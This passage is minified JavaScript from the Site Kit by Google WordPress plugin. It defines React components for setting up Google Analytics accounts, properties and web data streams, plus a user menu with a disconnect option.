"},86582:(e,t,i)=>{"use strict";i.d(t,{A:()=>s});var a=i(20697);function s(e){return a.kz.includes(e)}},87395:(e,t,i)=>{"use strict";i.d(t,{EF:()=>AccountCreate,Jt:()=>AccountCreateLegacy,QB:()=>AccountSelect,pk:()=>z.A,Ji:()=>PropertyHint,Co:()=>PropertySelect,Qv:()=>B.Ay,W2:()=>WebDataStreamHint,MI:()=>WebDataStreamNameInput,nH:()=>WebDataStreamSelect,QQ:()=>ZeroDataMessage});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(82871),l=i(63696),c=i(13606),d=i(82286),g=i(54419),u=i(50539),m=i(49383),p=i(30805),I=i(80),h=i(22942),y=i(29785),A=i(97345),M=i(11999),N=i(70301),f=i(13137),T=i(6109),S=i(51858),k=i(10740),j=i(78014),v=i(30511),b=i(68832),_=i(62540);function TimezoneSelect(){const e=(0,b.A)(I.ag,"countryCode"),t=(0,b.A)(I.ag,"timezone"),{setValues:i}=(0,u.useDispatch)(M.s),a=(0,l.useCallback)((e,t)=>{i(I.ag,{timezone:t.dataset.value})},[i]);return(0,_.jsx)(m.Select,{className:"googlesitekit-analytics__select-timezone",label:(0,r.__)("Timezone","google-site-kit"),value:t,onEnhancedChange:a,disabled:!e,enhanced:!0,outlined:!0,children:(v.VI[e]||[]).map(({timeZoneId:e,displayName:t},i)=>(0,_.jsx)(m.Option,{value:e,children:t},i))})}function CreateAccountField({hasError:e,value:t,setValue:i,name:a,label:s}){return void 0===t?null:(0,_.jsx)(m.TextField,{className:n()("mdc-text-field",{"mdc-text-field--error":e}),label:s,name:a,onChange:e=>{i(e.target.value,a)},value:t,id:`googlesitekit_analytics_account_create_${a}`,outlined:!0})}function AccountField(){const e=(0,b.A)(I.ag,"accountName"),{setValues:t}=(0,u.useDispatch)(M.s),i=(0,l.useCallback)(e=>{t(I.ag,{accountName:e})},[t]);return(0,_.jsx)(CreateAccountField,{label:(0,r.__)("Account","google-site-kit"),hasError:!e,value:e,setValue:i,name:"account"})}var x=i(88273);function PropertyField(){const e=(0,p.i)("setupFlowRefresh"),t=(0,b.A)(I.ag,"propertyName"),{setValues:i}=(0,u.useDispatch)(M.s),a=(0,u.useSelect)(e=>e(x.i).isModuleConnected(h.L1)),s=(0,l.useCallback)(e=>{i(I.ag,{propertyName:e})},[i]),o=e&&!a;return(0,_.jsxs)(l.Fragment,{children:[(0,_.jsx)(CreateAccountField,{label:(0,r.__)("Property","google-site-kit"),value:t,hasError:!t,setValue:s,name:"property"}),o&&(0,_.jsx)(PropertyHint,{})]})}function CountrySelect(){const e=(0,b.A)(I.ag,"countryCode"),{setValues:t}=(0,u.useDispatch)(M.s),i=(0,l.useCallback)((i,a)=>{const s=a.dataset.value;s!==e&&v.fX[s]&&t(I.ag,{countryCode:s,timezone:v.fX[s].defaultTimeZoneId})},[t,e]);return(0,_.jsx)(m.Select,{className:"googlesitekit-analytics__select-country",label:(0,r.__)("Country","google-site-kit"),value:e,onEnhancedChange:i,enhanced:!0,outlined:!0,children:v.mn.map(({countryCode:e,displayName:t},i)=>(0,_.jsx)(m.Option,{value:e,children:t},i))})}function WebDataStreamField(){const e=(0,p.i)("setupFlowRefresh"),t=(0,b.A)(I.ag,"dataStreamName"),{setValues:i}=(0,u.useDispatch)(M.s),a=(0,u.useSelect)(e=>e(x.i).isModuleConnected(h.L1)),s=(0,l.useCallback)(e=>{i(I.ag,{dataStreamName:e})},[i]),o=e&&!a;return(0,_.jsxs)(l.Fragment,{children:[(0,_.jsx)(CreateAccountField,{label:(0,r.__)("Web data stream","google-site-kit"),value:t,hasError:!t,setValue:s,name:"dataStream"}),o&&(0,_.jsx)(WebDataStreamHint,{})]})}var C=i(62659),D=i(35410),E=i(33052),w=i(83880),Z=i(38432),R=i(64515);function AccountCreate({className:e}){const t=(0,p.i)("setupFlowRefresh"),[i,a]=(0,l.useState)(!1),s=(0,u.useSelect)(e=>e(I.K9).getAccountSummaries()),o=(0,u.useSelect)(e=>e(I.K9).hasFinishedResolution("getAccountSummaries")),v=(0,u.useSelect)(e=>e(I.K9).getAccountTicketTermsOfServiceURL()),x=(0,u.useSelect)(e=>e(I.K9).canSubmitAccountCreate()),L=(0,u.useSelect)(e=>e(I.K9).isDoingCreateAccount()),G=(0,u.useSelect)(e=>e(A.oR).hasScope(I.S9)),O=(0,u.useSelect)(e=>e(A.oR).hasScope(I.iB)),P=(0,u.useSelect)(e=>e(M.s).hasForm(I.ag)),B=(0,b.A)(I.ag,"autoSubmit"),U=(0,u.useSelect)(e=>e(y.O4).getReferenceSiteURL()),W=(0,u.useSelect)(e=>e(y.O4).getSiteName()),H=(0,u.useSelect)(e=>e(y.O4).getTimezone()),V=(0,u.useSelect)(e=>e(y.O4).getDocumentationLinkURL("plugin-conversion-tracking")),Y=(0,C.A)(),{setValues:F}=(0,u.useDispatch)(M.s),{navigateTo:Q}=(0,u.useDispatch)(N.M),{createAccount:J}=(0,u.useDispatch)(I.K9),{setPermissionScopeError:X}=(0,u.useDispatch)(A.oR),{setConversionTrackingEnabled:q,saveConversionTrackingSettings:K}=(0,u.useDispatch)(y.O4),$=G;(0,l.useEffect)(()=>{v&&(async()=>{await(0,g.invalidateCache)("modules",h.L1),Q(v)})()},[v,Q]),(0,l.useEffect)(()=>{P||F(I.ag,(0,S.cN)({siteName:W,siteURL:U,timezone:H}))},[P,W,U,H,F]);const ee=(0,d.d)(location.href,"showProgress"),te=!!ee&&t,ie=(0,l.useCallback)(async()=>{const e=[];if(G||e.push(I.S9),O||e.push(I.iB),e.length>0)return F(I.ag,{autoSubmit:!0}),void X({code:f.db,message:(0,r.__)("Additional permissions are required to create a new Analytics account.","google-site-kit"),data:{status:403,scopes:e,skipModal:!0}});F(I.ag,{autoSubmit:!1}),te?await(0,T.sx)(`${Y}_setup`,"setup_flow_v3_create_analytics_account"):await(0,T.sx)(`${Y}_analytics`,"create_account","proxy");const{error:t}=await J({showProgress:"true"===ee});t||(q(!0),await K(),a(!0))},[G,O,F,te,J,ee,X,Y,q,K]);(0,l.useEffect)(()=>{$&&B&&ie()},[$,B,ie]);const{rollbackSettings:ae}=(0,u.useDispatch)(I.K9),se=(0,l.useCallback)(()=>ae(),[ae]);return L||i||!o||void 0===$?(0,_.jsx)(m.ProgressBar,{}):(0,_.jsxs)("div",{className:e,children:[(0,_.jsx)(j.A,{moduleSlug:"analytics-4",storeName:I.K9}),!te&&(0,_.jsx)(E.A,{as:"h3",type:"title",size:"large",children:(0,r.__)("Create your Analytics account","google-site-kit")}),(0,_.jsx)(w.A,{size:te?"large":void 0,children:(0,r.__)("We’ve pre-filled the required information for your new account. Confirm or edit any details:","google-site-kit")}),(0,_.jsxs)("div",{className:"googlesitekit-setup-module__inputs",children:[(0,_.jsx)(k.fh,{size:6,children:(0,_.jsx)(AccountField,{})}),(0,_.jsx)(k.fh,{size:6,children:(0,_.jsx)(PropertyField,{})}),(0,_.jsx)(k.fh,{size:6,children:(0,_.jsx)(WebDataStreamField,{})})]}),(0,_.jsxs)("div",{className:"googlesitekit-setup-module__inputs",children:[(0,_.jsx)(k.fh,{size:6,children:(0,_.jsx)(CountrySelect,{})}),(0,_.jsx)(k.fh,{size:6,children:(0,_.jsx)(TimezoneSelect,{})})]}),(0,_.jsxs)("div",{className:"googlesitekit-setup-module__inputs",children:[(0,_.jsx)(z.A,{formName:I.ag,className:"googlesitekit-margin-bottom-0"}),(0,_.jsx)(D.A,{className:n()({"googlesitekit-margin-top-0":!t}),message:(0,c.A)((0,r.__)("To track how visitors interact with your site, Site Kit will enable plugin conversion tracking. You can always disable it in settings. <LearnMoreLink />","google-site-kit"),{LearnMoreLink:t?(0,_.jsx)(Z.A,{href:V,external:!0,children:(0,r.__)("Learn more","google-site-kit")}):(0,_.jsx)(R.A,{})})})]}),(0,_.jsxs)(w.A,{className:"googlesitekit-analytics-setup__analytics-create-account-info",size:t?"small":void 0,children:[$&&(0,_.jsx)("span",{children:(0,r.__)("You will be redirected to Google Analytics to accept the terms of service.","google-site-kit")}),!$&&(0,_.jsx)("span",{children:(0,r.__)("You will need to give Site Kit permission to create an Analytics account on your behalf and also accept the Google Analytics terms of service.","google-site-kit")})]}),(0,_.jsxs)("div",{className:"googlesitekit-setup-module__action",children:[(0,_.jsx)(m.Button,{disabled:!x,onClick:ie,children:(0,r.__)("Create Account","google-site-kit")}),s&&!!s.length&&(0,_.jsx)(m.Button,{className:"googlesitekit-setup-module__sub-action",onClick:se,tertiary:!0,children:(0,r.__)("Back","google-site-kit")})]})]})}AccountCreate.propTypes={className:s().string};var L=i(25797),G=i(76984);function CreatePropertyInfoNotice(){const e=(0,u.useSelect)(e=>e(y.O4).getDocumentationLinkURL("ga4"));return(0,_.jsx)(L.A,{type:G.Q.INFO,description:(0,c.A)((0,r.__)("Got a Google Analytics property and want to find out how to use it with Site Kit? <a>Learn more</a>","google-site-kit"),{a:(0,_.jsx)(Z.A,{href:e,external:!0})})})}function AccountCreateLegacy(){const e=(0,u.useSelect)(e=>e(I.K9).getAccountSummaries()),t=(0,u.useSelect)(e=>e(I.K9).hasFinishedResolution("getAccountSummaries")),a=(0,u.useSelect)(e=>e(I.K9).getAccountID()),s=I.ZC===a,o=(0,u.useSelect)(e=>e(I.K9).getServiceURL({path:"/provision/SignUp"})),n=(0,C.A)(),c=(0,l.useCallback)(async e=>{e.preventDefault(),await(0,T.sx)(`${n}_analytics`,"create_account","custom-oauth"),i.g.open(o,"_blank")},[o,n]),{resetAccountSummaries:d,resetAccountSettings:g}=(0,u.useDispatch)(I.K9),p=(0,l.useCallback)(()=>{d(),g()},[g,d]);return t?(0,_.jsxs)("div",{children:[(0,_.jsx)(CreatePropertyInfoNotice,{}),(0,_.jsx)(j.A,{moduleSlug:"analytics-4",storeName:I.K9}),!s&&e&&0===e.length&&(0,_.jsx)(w.A,{children:(0,r.__)('Looks like you don’t have an Analytics account yet. Once you create it, click on "Re-fetch my account" and Site Kit will locate it.',"google-site-kit")}),s&&(0,_.jsxs)(l.Fragment,{children:[(0,_.jsx)(w.A,{children:(0,r.__)("To create a new account, click the button below which will open the Google Analytics account creation screen in a new window.","google-site-kit")}),(0,_.jsx)(w.A,{children:(0,r.__)("Once completed, click the link below to re-fetch your accounts to continue.","google-site-kit")})]}),(0,_.jsxs)("div",{className:"googlesitekit-setup-module__action",children:[(0,_.jsx)(m.Button,{onClick:c,children:(0,r.__)("Create an account","google-site-kit")}),(0,_.jsx)("div",{className:"googlesitekit-setup-module__sub-action",children:(0,_.jsx)(m.Button,{onClick:p,tertiary:!0,children:(0,r.__)("Re-fetch My Account","google-site-kit")})})]})]}):(0,_.jsx)(m.ProgressBar,{})}function AccountSelect({hasModuleAccess:e,onChange:t}){const i=(0,C.A)(),a=(0,u.useSelect)(e=>e(I.K9).getAccountID()),s=(0,u.useSelect)(e=>e(I.K9).getAccountSummaries()),o=(0,u.useSelect)(e=>e(I.K9).hasFinishedResolution("getAccountSummaries")),{selectAccount:n}=(0,u.useDispatch)(I.K9),c=(0,l.useCallback)((e,s)=>{const o=s.dataset.value;if(a!==o){n(o);const e=o===I.ZC?"change_account_new":"change_account";(0,T.sx)(`${i}_analytics`,e),t&&t()}},[a,n,i,t]);return o?!1===e?(0,_.jsx)(m.Select,{className:"googlesitekit-analytics__select-account",label:(0,r.__)("Account","google-site-kit"),value:a,enhanced:!0,outlined:!0,disabled:!0,children:(0,_.jsx)(m.Option,{value:a,children:a})}):(0,_.jsx)(m.Select,{className:"googlesitekit-analytics__select-account",label:(0,r.__)("Account","google-site-kit"),value:a,onEnhancedChange:c,enhanced:!0,outlined:!0,children:(s||[]).concat({_id:I.ZC,displayName:(0,r.__)("Set up a new account","google-site-kit")}).map(({_id:e,displayName:t},i)=>(0,_.jsx)(m.Option,{value:e,children:t},i))}):(0,_.jsx)(m.ProgressBar,{small:!0})}AccountSelect.propTypes={hasModuleAccess:s().bool};var z=i(25850),O=i(21492);function PropertyHint(){const e=(0,u.useSelect)(e=>e(y.O4).getDocumentationLinkURL("ga4-property"));return(0,_.jsx)(O.A,{leadingText:(0,r.__)("What is an Analytics property?","google-site-kit"),tooltipText:(0,c.A)((0,r.__)("An Analytics property is a container for data collected from a website. It represents a specific website, and within a property, you can view reports, manage data collection, attribution, privacy settings, and product links. <a>Learn more</a>","google-site-kit"),{a:(0,_.jsx)(Z.A,{href:e,external:!0,hideExternalIndicator:!0})})})}var P=i(70670);function PropertySelect(e){const{isDisabled:t,hasModuleAccess:i,className:a,onChange:s=()=>{}}=e,o=(0,u.useSelect)(e=>e(I.K9).getAccountID()),c=(0,u.useSelect)(e=>i&&!t?e(I.K9).getPropertySummaries(o)||[]:null),d=(0,u.useSelect)(e=>e(I.K9).getPropertyID()),g=(0,u.useSelect)(e=>!t&&(e(I.K9).isLoadingPropertySummaries()||e(I.K9).isLoadingWebDataStreams({hasModuleAccess:i}))),p=(0,C.A)(),{selectProperty:h}=(0,u.useDispatch)(I.K9),y=(0,l.useCallback)((e,{dataset:t})=>{const i=t.value;d!==i&&(h(i),(0,T.sx)(`${p}_analytics`,i===I.to?"change_property_new":"change_property","ga4"),s())},[s,d,h,p]);if(!(0,P.HX)(o))return null;if(g)return(0,_.jsx)(m.ProgressBar,{mobileVerticalSpacing:76,desktopVerticalSpacing:84,small:!0});const A=void 0===d||""===d||(0,P.mh)(d);return!1===i?(0,_.jsx)(m.Select,{className:n()("googlesitekit-analytics-4__select-property",a),label:(0,r.__)("Property","google-site-kit"),value:d,enhanced:!0,outlined:!0,disabled:!0,children:(0,_.jsx)(m.Option,{value:d,children:d})}):(0,_.jsx)(m.Select,{className:n()("googlesitekit-analytics-4__select-property",a,{"mdc-select--invalid":!A,"googlesitekit-analytics-4__select-property--loaded":!t&&!g}),label:(0,r.__)("Property","google-site-kit"),value:d,onEnhancedChange:y,disabled:t,enhanced:!0,outlined:!0,children:(c||[]).concat({_id:I.to,displayName:(0,r.__)("Set up a new property","google-site-kit")}).map(({_id:e,displayName:t})=>(0,_.jsx)(m.Option,{value:e,children:e===I.to?t:(0,r.sprintf)(/* translators: 1: Property name. 2: Property ID. */ /* translators: 1: Property name. 2: Property ID. */ (0,r._x)("%1$s (%2$s)","Analytics property name and ID","google-site-kit"),t,e)},e))})}PropertySelect.propTypes={isDisabled:s().bool,hasModuleAccess:s().bool,className:s().string,onChange:s().func};var B=i(9279);function WebDataStreamHint(){const e=(0,u.useSelect)(e=>e(y.O4).getDocumentationLinkURL("ga4-data-stream"));return(0,_.jsx)(O.A,{leadingText:(0,r.__)("What is a web data stream?","google-site-kit"),tooltipText:(0,c.A)((0,r.__)("A data stream is a flow of data from your visitors to Analytics. When a data stream is created, Analytics generates a snippet of code that is added to your site to collect that data. <a>Learn more</a>","google-site-kit"),{a:(0,_.jsx)(Z.A,{href:e,external:!0,hideExternalIndicator:!0})})})}var U=i(15844),W=i(84024),H=i(14307);function WebDataStreamNameInput(){const e=(0,u.useSelect)(e=>e(I.K9).getPropertyID()),t=(0,u.useSelect)(e=>e(I.K9).getWebDataStreamID()),i=(0,b.A)(I.ZY,"webDataStreamName"),a=(0,u.useSelect)(t=>!!(0,P.Hl)(e)&&t(I.K9).doesWebDataStreamExist(e,i)),s=(0,u.useSelect)(e=>e(y.O4).getReferenceSiteURL()),{setValues:o}=(0,u.useDispatch)(M.s),c=(0,l.useCallback)(({currentTarget:e})=>{o(I.ZY,{webDataStreamName:e.value})},[o]);if((0,U.A)(()=>{if(!i&&(0,W.m)(s)){const{hostname:e}=new URL(s);o(I.ZY,{webDataStreamName:e})}}),t!==I.Oh)return null;const d=a||!i||!(0,P.uv)(i);let g=!1;return a?g=(0,r.__)("A web data stream with this name already exists.","google-site-kit"):i?(0,P.uv)(i)||(g=(0,r.__)("This is not a valid web data stream name.","google-site-kit")):g=(0,r.__)("A web data stream name is required.","google-site-kit"),(0,_.jsx)("div",{className:"googlesitekit-analytics-webdatastreamname",children:(0,_.jsx)(m.TextField,{className:n()({"mdc-text-field--error":d}),label:(0,r.__)("Web data stream name","google-site-kit"),helperText:g,trailingIcon:d&&(0,_.jsx)("span",{className:"googlesitekit-text-field-icon--error",children:(0,_.jsx)(H.A,{})}),value:i,onChange:c,outlined:!0})})}function WebDataStreamSelect(e){const{hasModuleAccess:t,isDisabled:i,className:a,onChange:s}=e,o=(0,u.useSelect)(e=>e(I.K9).getAccountID()),{propertyID:c,webDataStreamID:d,measurementID:g}=(0,u.useSelect)(e=>e(I.K9).getSettings()||{}),p=(0,u.useSelect)(e=>(0,P.Hl)(c)&&t?e(I.K9).getWebDataStreams(c):[]),h=(0,u.useSelect)(e=>!i&&e(I.K9).isLoadingWebDataStreams({hasModuleAccess:t})),y=(0,C.A)(),{setWebDataStreamID:A,updateSettingsForMeasurementID:M}=(0,u.useDispatch)(I.K9),N=(0,l.useCallback)((e,{dataset:t})=>{const i=t.value;d!==i&&(A(i),M(p.find(({_id:e})=>e===i)?.webStreamData?.measurementId||""),(0,T.sx)(`${y}_analytics`,i===I.Oh?"change_webdatastream_new":"change_webdatastream","ga4"),s&&s())},[p,d,A,M,y,s]);if(!(0,P.HX)(o))return null;if(h)return(0,_.jsx)(m.ProgressBar,{mobileVerticalSpacing:76,desktopVerticalSpacing:84,small:!0});const f=void 0===d||""===d||(0,P.dQ)(d);return!1===t?(0,_.jsx)(m.Select,{className:n()("googlesitekit-analytics-4__select-webdatastream",a),label:(0,r.__)("Web data stream","google-site-kit"),value:g,enhanced:!0,outlined:!0,disabled:!0,children:(0,_.jsx)(m.Option,{value:g,children:g})}):(0,_.jsx)(m.Select,{className:n()("googlesitekit-analytics-4__select-webdatastream",a,{"mdc-select--invalid":!f}),label:(0,r.__)("Web data stream","google-site-kit"),value:d,onEnhancedChange:N,disabled:i||!(0,P.mh)(c),enhanced:!0,outlined:!0,children:(p||[]).concat({_id:I.Oh,displayName:(0,r.__)("Set up a new web data stream","google-site-kit")}).map(({_id:e,displayName:t,webStreamData:i={}},a)=>(0,_.jsx)(m.Option,{value:e,children:e!==I.Oh&&i?.measurementId?(0,r.sprintf)(/* translators: 1: Data stream name. 2: Measurement ID. */ /* translators: 1: Data stream name. 2: Measurement ID. */ (0,r._x)("%1$s (%2$s)","Analytics data stream name and measurement ID","google-site-kit"),t,i.measurementId):t},a))})}WebDataStreamSelect.propTypes={hasModuleAccess:s().bool,isDisabled:s().bool,className:s().string};i(67526);function ZeroDataMessage({skipPrefix:e}){const t=(0,u.useSelect)(e=>e(y.O4).getCurrentEntityURL());return e?t?(0,_.jsx)("span",{children:(0,r.__)("Your page hasn’t received any visitors yet","google-site-kit")}):(0,_.jsx)("span",{children:(0,r.__)("Your site hasn’t received any visitors yet","google-site-kit")}):t?(0,_.jsx)("span",{children:(0,r.__)("No data to display: your page hasn’t received any visitors yet","google-site-kit")}):(0,_.jsx)("span",{children:(0,r.__)("No data to display: your site hasn’t received any visitors yet","google-site-kit")})}ZeroDataMessage.propTypes={skipPrefix:s().bool}},88176:e=>{"use strict";e.exports=googlesitekit.widgets},88273:(e,t,i)=>{"use strict";i.d(t,{U:()=>s,i:()=>a});const a="core/modules",s="insufficient_module_dependencies"},88933:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 43 44"},e),a||(a=s.createElement("g",{fill:"none",fillRule:"evenodd"},s.createElement("path",{fill:"#FBBC05",d:"m2.253 12.252 7.399 5.658A13 13 0 0 0 9 22c0 1.43.229 2.805.652 4.09l-7.4 5.658A22 22 0 0 1 0 22c0-3.506.81-6.814 2.253-9.748"}),s.createElement("path",{fill:"#EA4335",d:"m9.652 17.91-7.4-5.658A21.94 21.94 0 0 1 22 0c5.6 0 10.6 2.1 14.5 5.5l-6.4 6.4C27.9 10.1 25.1 9 22 9c-5.77 0-10.64 3.725-12.348 8.91"}),s.createElement("path",{fill:"#34A853",d:"m2.25 31.742 7.396-5.67A12.975 12.975 0 0 0 22 35c6.1 0 10.7-3.1 11.8-8.5H22V18h20.5c.3 1.3.5 2.7.5 4 0 14-10 22-21 22A21.94 21.94 0 0 1 2.25 31.742"}),s.createElement("path",{fill:"#4285F4",d:"m36.34 38.52-7.025-5.437c2.297-1.45 3.895-3.685 4.485-6.583H22V18h20.5c.3 1.3.5 2.7.5 4 0 7.17-2.623 12.767-6.66 16.52"}))))},89065:(e,t,i)=>{"use strict";i.d(t,{A:()=>SurveyViewTrigger});var a=i(63696),s=i(62688),o=i.n(s),n=i(50539),r=i(97345);function SurveyViewTrigger({triggerID:e,ttl:t=0}){const{triggerSurvey:i}=(0,n.useDispatch)(r.oR);return(0,a.useEffect)(()=>{i(e,{ttl:t})},[e,t,i]),null}SurveyViewTrigger.propTypes={triggerID:o().string.isRequired,ttl:o().number}},89351:(e,t,i)=>{"use strict";i.d(t,{A:()=>Je});var a,s,o=i(62688),n=i.n(o),r=i(4452),l=i.n(r),c=i(41814),d=i(82871),g=i(63696),u=i(50539),m=i(44436),p=i(21795),I=i(31589),h=i(19266),y=i(49383),A=i(59865),M=i(6109),N=i(49993),f=i(94656),T=i(97345),S=i(62540);function Details(){const e=(0,u.useSelect)(e=>e(T.oR).getPicture()),t=(0,u.useSelect)(e=>e(T.oR).getFullName()),i=(0,u.useSelect)(e=>e(T.oR).getEmail());return(0,S.jsxs)("div",{className:"googlesitekit-user-menu__details","aria-label":(0,d.__)("Google account","google-site-kit"),children:[!!e&&(0,S.jsx)("img",{className:"googlesitekit-user-menu__details-avatar",src:e,alt:""}),(0,S.jsxs)("div",{className:"googlesitekit-user-menu__details-info",children:[(0,S.jsx)("p",{className:"googlesitekit-user-menu__details-info__name",children:t}),(0,S.jsx)("p",{className:"googlesitekit-user-menu__details-info__email","aria-label":(0,d.__)("Email","google-site-kit"),children:i})]})]})}function Item({icon:e,label:t}){return(0,S.jsxs)("div",{className:"googlesitekit-user-menu__item",children:[(0,S.jsx)("div",{className:"googlesitekit-user-menu__item-icon",children:e}),(0,S.jsx)("span",{className:"googlesitekit-user-menu__item-label",children:t})]})}function k(){return k=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},k.apply(null,arguments)}Item.propTypes={icon:n().node,label:n().string};const j=e=>g.createElement("svg",k({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),a||(a=g.createElement("path",{stroke:"#6C726E",strokeLinecap:"round",strokeWidth:1.7,d:"m11.775 5.701.58-.58a4.547 4.547 0 0 1 6.43 0v0a4.547 4.547 0 0 1 0 6.43l-.598.599m-12.504-.357-.562.562a4.547 4.547 0 0 0 0 6.43v0a4.547 4.547 0 0 0 6.43 0l.58-.58"})),s||(s=g.createElement("path",{stroke:"#6C726E",strokeLinecap:"round",strokeWidth:1.5,d:"m8.543 15.363 1.118-1.118m5.684-5.684L14.226 9.68M5.107 5.134l13.664 13.664"})));var v,b,_,x,C;function D(){return D=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},D.apply(null,arguments)}const E=e=>g.createElement("svg",D({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),v||(v=g.createElement("rect",{width:18,height:13,x:3,y:4,stroke:"#6C726E",strokeWidth:1.5,rx:2})),b||(b=g.createElement("path",{fill:"#6C726E",d:"M9 17h6v3H9z"})),_||(_=g.createElement("path",{stroke:"#6C726E",strokeLinecap:"round",strokeWidth:1.5,d:"M10 9h7M10 12h7"})),x||(x=g.createElement("circle",{cx:7,cy:9,r:1,fill:"#6C726E"})),C||(C=g.createElement("circle",{cx:7,cy:12,r:1,fill:"#6C726E"})));var w,Z,R;function L(){return L=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},L.apply(null,arguments)}const G=e=>g.createElement("svg",L({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),w||(w=g.createElement("rect",{width:18,height:12,x:3,y:6,stroke:"#6C726E",strokeWidth:1.5,rx:2})),Z||(Z=g.createElement("path",{stroke:"#6C726E",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.5,d:"m3.566 7.5 7.086 7.086a2 2 0 0 0 2.829 0l7.019-7.02"})),R||(R=g.createElement("path",{stroke:"#6C726E",strokeLinecap:"round",strokeWidth:1.5,d:"M20.246 17.5 15.5 12.754M4 17.5l4.746-4.746"})));var z=i(29785),O=i(7972),P=i(70301),B=i(80),U=i(76729),W=i(12896),H=i(62659),V=i(68832),Y=i(30805);function UserMenu(){const e=(0,Y.i)("proactiveUserEngagement"),t=(0,u.useSelect)(e=>e(z.O4).getProxyPermissionsURL()),i=(0,u.useSelect)(e=>e(T.oR).getEmail()),a=(0,u.useSelect)(e=>e(T.oR).getPicture()),s=(0,u.useSelect)(e=>e(T.oR).getFullName()),o=(0,u.useSelect)(e=>e(z.O4).getAdminURL("googlesitekit-splash",{googlesitekit_context:"revoked"})),n=(0,V.A)(B.CV,"isAutoCreatingCustomDimensionsForAudience"),[r,l]=(0,g.useState)(!1),[c,m]=(0,g.useState)(!1),k=(0,g.useRef)(),v=(0,g.useRef)(),b=(0,H.A)(),{navigateTo:_}=(0,u.useDispatch)(P.M);(0,p.A)(k,()=>m(!1)),(0,W.l)([h._f,h.wn],k,()=>{m(!1),v.current?.focus()});const x=(0,g.useCallback)(()=>{l(!1),m(!1)},[l,m]),C=(0,g.useCallback)(e=>{h._f===e.keyCode&&x()},[x]);(0,I.A)("keyup",C);const D=(0,g.useCallback)(()=>{c||(0,M.sx)(`${b}_headerbar`,"open_usermenu"),m(!c)},[c,b]),w=(0,g.useCallback)(()=>{l(!r),m(!1)},[r]),{setValue:Z}=(0,u.useDispatch)(O.n),R=(0,g.useCallback)(async(e,i)=>{const{detail:{item:a}}=i;switch(a?.id){case"manage-sites":t&&(await(0,M.sx)(`${b}_headerbar_usermenu`,"manage_sites"),_(t));break;case"disconnect":w();break;case"manage-email-reports":Z(U.Q,!0);break;default:D()}},[t,D,w,_,Z,b]),L=(0,g.useCallback)(async()=>{l(!1),await(0,N.IL)(),await(0,M.sx)(`${b}_headerbar_usermenu`,"disconnect_user"),_(o)},[o,_,b]);if(!i)return null;let F;return s&&i&&(F=(0,d.sprintf)(/* translators: Account info text. 1: User's (full) name 2: User's email address. */ /* translators: Account info text. 1: User's (full) name 2: User's email address. */ (0,d.__)("Google Account for %1$s (Email: %2$s)","google-site-kit"),s,i)),s&&!i&&(F=(0,d.sprintf)(/* translators: Account info text. 1: User's (full) name. */ /* translators: Account info text. 1: User's (full) name. */ (0,d.__)("Google Account for %1$s","google-site-kit"),s)),!s&&i&&(F=(0,d.sprintf)(/* translators: Account info text. 1: User's email address. */ /* translators: Account info text. 1: User's email address. */ (0,d.__)("Google Account (Email: %1$s)","google-site-kit"),i)),(0,S.jsxs)(g.Fragment,{children:[(0,S.jsxs)("div",{ref:k,className:"googlesitekit-user-selector googlesitekit-dropdown-menu googlesitekit-dropdown-menu__icon-menu mdc-menu-surface--anchor",children:[(0,S.jsx)(y.Button,{disabled:n,ref:v,className:"googlesitekit-header__dropdown mdc-button--dropdown googlesitekit-border-radius-round--tablet googlesitekit-border-radius-round--phone googlesitekit-border-radius-round googlesitekit-button-icon",onClick:D,icon:!!a&&(0,S.jsx)("i",{className:"mdc-button__icon mdc-button__account","aria-hidden":"true",children:(0,S.jsx)("img",{className:"mdc-button__icon--image",src:a,alt:(0,d.__)("User Avatar","google-site-kit")})}),"aria-haspopup":"menu","aria-expanded":c,"aria-controls":"user-menu","aria-label":n?void 0:(0,d.__)("Account","google-site-kit"),tooltipEnterDelayInMS:500,customizedTooltip:n?null:(0,S.jsxs)("span",{"aria-label":F,children:[(0,S.jsx)("strong",{children:(0,d.__)("Google Account","google-site-kit")}),(0,S.jsx)("br",{}),(0,S.jsx)("br",{}),s,s&&(0,S.jsx)("br",{}),i]}),text:!0,tooltip:!0}),(0,S.jsxs)(y.Menu,{className:"googlesitekit-user-menu",menuOpen:c,onSelected:R,id:"user-menu",children:[(0,S.jsx)("li",{children:(0,S.jsx)(Details,{})}),e&&(0,S.jsx)("li",{id:"manage-email-reports",className:"mdc-list-item",role:"menuitem",children:(0,S.jsx)(Item,{icon:(0,S.jsx)(G,{width:"24"}),label:(0,d.__)("Manage email reports","google-site-kit")})}),!!t&&(0,S.jsx)("li",{id:"manage-sites",className:"mdc-list-item",role:"menuitem",children:(0,S.jsx)(Item,{icon:(0,S.jsx)(E,{width:"24"}),label:(0,d.__)("Manage Sites","google-site-kit")})}),(0,S.jsx)("li",{id:"disconnect",className:"mdc-list-item",role:"menuitem",children:(0,S.jsx)(Item,{icon:(0,S.jsx)(j,{width:"24"}),label:(0,d.__)("Disconnect","google-site-kit")})})]})]}),(0,S.jsx)(f.A,{children:(0,S.jsx)(A.A,{dialogActive:r,handleConfirm:L,handleCancel:x,onClose:x,title:(0,d.__)("Disconnect","google-site-kit"),subtitle:(0,d.__)("Disconnecting Site Kit by Google will remove your access to all services. After disconnecting, you will need to re-authorize to restore 